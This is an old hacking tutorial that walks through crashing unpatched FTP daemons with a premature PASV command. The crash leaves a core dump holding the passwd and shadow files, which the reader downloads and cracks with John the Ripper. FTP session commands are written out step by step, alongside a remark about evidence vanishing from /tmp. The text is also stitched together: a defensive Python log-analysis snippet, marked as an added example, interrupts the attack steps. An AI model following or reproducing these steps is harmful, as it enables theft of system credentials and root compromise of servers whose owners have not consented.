Exploiting the FTP PASV Vulnerability
10/7/99
Russ Rogers
OSAll Staff
Note: Some fixes to this problem are discussed in a newsgroup thread at http://remus.prakinf.tu-ilmenau.de/ssl-users/archive9/0080.html
One of my favorite methods of accessing account names and passwords is using a PASV vulnerability that exists in the FTP daemons of some UNIX OSes. There are patches out to close this exploit, but the system administrator has to actually be interested enough to download the patch and install it. On an unpatched system the daemon crashes and leaves a core dump file that contains the entire /etc/passwd file AND the /etc/shadow file. Some versions of SSLftpd have also been known to have this vulnerability.

NOTE: This exploit requires at least ONE FTP user account that is NOT anonymous. You can either get this using a sniffer, a brute force attack, or you might already have one on the system.

Ok, the way this attack works is that it allows you to issue a premature PASV (passive mode) command. This command will crash some variations of an FTP daemon. When the daemon crashes, it also leaves a core file that contains a complete memory dump of all the information that resided in relevant memory prior to the crash. In our case, we want it to contain the /etc/passwd and /etc/shadow files.

Let's start by FTP'ing into the target computer using the user name and password that we already have. Chances are that this name/password combination is for an ordinary user, otherwise you wouldn't need this exploit. :)
% ftp ftp.victim.com
Connected to ducktank.net.
victim.com FTP server (Version wu-2.4.2-academ May 7 10:00:46 1999) ready.
User (victim.com:(none)): lamer
Password required for lamer.
Password: lamepwd
Once we're in, let's change directory into the /tmp directory. This will be the directory that the core file will be dumped to for our later retrieval. Plus, since we all know that system administrators never look in here, we can be sure that the file will be removed at the next reboot. POOF! What evidence?
FTP> cd /tmp
Now we're logged in as a normal user AND we're in the right directory. What we need to do is try to become another user so that the FTP daemon loads the passwd and shadow files into local memory.
FTP> user root
wrongpass
Issuing the PASV command at the FTP prompt on vulnerable machines will now result in a core dump containing the /etc/passwd and /etc/shadow files.
FTP> quote pasv
If the command did NOT produce a core file and the system is already patched, you will see the result "Entering passive mode". Otherwise, it will probably kick you off the system and restart itself. At this point, you need to log back in with your user name and password.

Once you're back in, change back into the /tmp directory and issue the command to download the core file. After this, you can log out.
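From the defender's side, the sequence above (re-login as another user, failed password, then PASV with no reply) is visible on the control channel. As an added example, not part of the original article, here is a small Python check that runs over a constructed FTP control-channel log and flags sessions that issue PASV while unauthenticated, plus any PASV that never received a reply, which is what a crashed daemon would leave behind. The log format and the sample lines are assumptions made for this example.

```python
import re
from collections import defaultdict

# Constructed FTP control-channel log (sample data, not from the article):
# each line is "<session> <C|S> <text>", C = client command, S = server reply.
SAMPLE_LOG = """\
s1 C USER lamer
s1 S 230 User lamer logged in.
s1 C CWD /tmp
s1 C USER root
s1 S 530 Login incorrect.
s1 C PASV
s2 C USER alice
s2 S 230 User alice logged in.
s2 C PASV
s2 S 227 Entering Passive Mode (10,0,0,5,200,10)
"""
LINE_RE = re.compile(r"^(\S+) ([CS]) (.*)$")

def find_premature_pasv(log_text):
    """Return {session: [reasons]} for sessions issuing PASV while not logged in.
    Per RFC 959 a new USER command restarts the login sequence, so a re-login
    attempt as another user leaves the session unauthenticated until a 230 reply."""
    authed = defaultdict(bool)        # session -> currently logged in?
    last_user = {}                    # session -> argument of the last USER
    pasv_pending = defaultdict(bool)  # session -> PASV still awaiting a reply
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        sess, side, text = m.groups()
        if side == "C":
            cmd, _, arg = text.partition(" ")
            if cmd.upper() == "USER":
                authed[sess] = False
                last_user[sess] = arg
            elif cmd.upper() == "PASV":
                pasv_pending[sess] = True
                if not authed[sess]:
                    findings[sess].append(
                        f"PASV while unauthenticated (last USER {last_user.get(sess, '?')!r})")
        else:
            if text[:3] == "230":
                authed[sess] = True
            pasv_pending[sess] = False  # any reply means the daemon survived
    for sess, pending in pasv_pending.items():  # unanswered PASV: possible crash
        if pending:
            findings[sess].append("no reply to PASV (daemon may have crashed)")
    return dict(findings)
```

Running it on SAMPLE_LOG flags only session s1; s2 is a normal logged-in PASV answered with 227.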
FTP> cd /tmp
FTP> bin
FTP> get ./core
FTP> quit
Congrats! Now you have a perfectly good passwd and shadow file. You'll need to edit them: remove the passwd file information from the core file and paste it into a new text file on your own machine. Then remove the encrypted password information from the shadow file portion of the core dump and paste that information into the passwd field of your new makeshift passwd file.

Now all you need to do is run a good password cracker like John the Ripper to obtain your root password. Individual results may vary! :-)